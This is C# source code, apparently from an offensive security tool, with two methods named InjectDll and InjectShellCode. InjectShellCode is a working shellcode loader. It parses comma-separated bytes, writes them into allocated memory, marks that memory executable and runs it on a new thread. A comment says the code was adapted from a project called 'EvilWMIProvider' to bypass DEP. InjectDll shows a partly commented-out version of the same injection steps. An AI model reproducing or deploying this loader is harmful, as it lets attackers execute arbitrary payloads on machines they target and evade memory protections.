public InjectDll(string library)
{
////////////////////////////////////////////////////////////////////////////////
IntPtr lpAddress = IntPtr.Zero;
UInt32 dwSize = (UInt32)((library.Length + 1) * Marshal.SizeOf(typeof(char)));
WriteOutputNeutral("Attempting to allocate memory");
IntPtr lpBaseAddress = Unmanaged.VirtualAlloc(lpAddress, dwSize, Unmanaged.MEM_COMMIT | Unmanaged.MEM_RESERVE, Unmanaged.PAGE_READWRITE);
WriteOutputGood("Allocated " + dwSize + " at " + lpBaseAddress);
////////////////////////////////////////////////////////////////////////////////
UInt32 lpNumberOfBytesWritten = 0;
IntPtr libraryPtr = Marshal.StringToHGlobalAnsi(library);
WriteOutputNeutral("Attempting to write process memory");
//Marshal.Copy(libraryPtr, 0, lpBaseAddress, dwSize);
WriteOutputGood("Wrote " + dwSize + " bytes");
////////////////////////////////////////////////////////////////////////////////
UInt32 lpflOldProtect = 0;
WriteOutputNeutral("Attempting to Alter Memory Protections to PAGE_EXECUTE_READ");
Boolean virtualProtectExResult = Unmanaged.VirtualProtect(lpBaseAddress, dwSize, Unmanaged.PAGE_EXECUTE_READ, ref lpflOldProtect);
if (virtualProtectExResult)
{
WriteOutputGood("Set Memory Protection to PAGE_EXECUTE_READ");
}
else
{
WriteOutputBad("Memory Protection Operation Failed");
}
////////////////////////////////////////////////////////////////////////////////
IntPtr lpThreadAttributes = IntPtr.Zero;
UInt32 dwStackSize = 0;
IntPtr lpParameter = IntPtr.Zero;
UInt32 dwCreationFlags = 0;
UInt32 threadId = 0;
WriteOutputNeutral("Attempting to start thread");
//IntPtr hThread = Unmanaged.CreateThread(lpThreadAttributes, dwStackSize, loadLibraryAddr, lpBaseAddress, dwCreationFlags, ref threadId);
//WriteOutputGood("Started Thread: " + hThread);
///////////////////////////////////////////////////////////////////////////////
//Unmanaged.WaitForSingleObject(hThread, 0xFFFFFFFF);
}
//Basis for function, improved to bypass DEP and to take string input
//https://github.com/subTee/EvilWMIProvider/blob/master/EvilWMIProvider/EvilWMIProvider.cs
public InjectShellCode(string shellCodeString)
{
const char DELIMITER = ',';
string[] shellCodeArray = shellCodeString.Split(DELIMITER);
byte[] shellCodeBytes = new Byte[shellCodeArray.Length];
for (int i = 0; i < shellCodeArray.Length; i++)
{
int value = (int)new System.ComponentModel.Int32Converter().ConvertFromString(shellCodeArray[i]);
shellCodeBytes[i] = Convert.ToByte(value);
}
////////////////////////////////////////////////////////////////////////////////
IntPtr lpAddress = IntPtr.Zero;
UInt32 dwSize = (UInt32)shellCodeBytes.Length;
IntPtr lpBaseAddress = Unmanaged.VirtualAlloc(lpAddress, dwSize, Unmanaged.MEM_COMMIT, Unmanaged.PAGE_READWRITE);
WriteOutput("Allocating Space at Address " + lpBaseAddress);
WriteOutput("Memory Protection Set to PAGE_READWRITE");
////////////////////////////////////////////////////////////////////////////////
Marshal.Copy(shellCodeBytes, 0, lpBaseAddress, shellCodeBytes.Length);
WriteOutput("Injected ShellCode at address " + lpBaseAddress);
////////////////////////////////////////////////////////////////////////////////
UInt32 lpflOldProtect = 0;
Boolean test = Unmanaged.VirtualProtect(lpBaseAddress, dwSize, Unmanaged.PAGE_EXECUTE_READ, ref lpflOldProtect);
WriteOutput("Altering Memory Protections to PAGE_EXECUTE_READ");
////////////////////////////////////////////////////////////////////////////////
IntPtr lpThreadAttributes = IntPtr.Zero;
UInt32 dwStackSize = 0;
IntPtr lpParameter = IntPtr.Zero;
UInt32 dwCreationFlags = 0;
UInt32 threadId = 0;
WriteOutput("Attempting to start thread");
IntPtr hThread = Unmanaged.CreateThread(lpThreadAttributes, dwStackSize, lpBaseAddress, lpParameter, dwCreationFlags, ref threadId);
WriteOutput("Started Thread: " + hThread);
////////////////////////////////////////////////////////////////////////////////
Unmanaged.WaitForSingleObject(hThread, 0xFFFFFFFF);
}